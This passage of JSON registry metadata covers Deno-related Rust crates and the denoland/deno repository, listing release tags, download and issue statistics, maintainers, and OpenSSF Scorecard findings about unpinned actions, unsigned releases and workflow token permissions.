osts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T08:31:37.118Z","dependent_packages_count":6,"downloads":984218,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":7.682354357246028,"dependent_repos_count":13.256646755239915,"dependent_packages_count":5.361750788050224,"stargazers_count":null,"forks_count":null,"docker_downloads_count":6.755160244109834,"average":8.2639780361615},"purl":"pkg:cargo/deno_lockfile","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_lockfile","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_lockfile","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_lockfile/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-01-23T15:18:36.585Z","updated_at":"2023-01-23T15:18:36.585Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-08-02T14:32:48.871Z","updated_at":"2023-08-02T14:32:48.871Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047998,"name":"deno-x86_64-unknown-linux-gnu","ecosystem":"cargo","description":"Binary dependencies for the 'deno' crate","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":33,"first_release_published_at":"2019-03-31T00:12:26.636Z","latest_release_published_at":"2019-11-15T18:18:35.101Z","latest_release_number":"0.24.0","last_synced_at":"2026-09-07T22:56:33.605Z","created_at":"2022-04-12T10:03:14.821Z","updated_at":"2026-09-07T22:56:33.606Z","registry_url":"https://crates.io/crates/deno-x86_64-unknown-linux-gnu/","install_command":"cargo install deno-x86_64-unknown-linux-gnu","documentation_url":"https://docs.rs/deno-x86_64-unknown-linux-gnu/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using 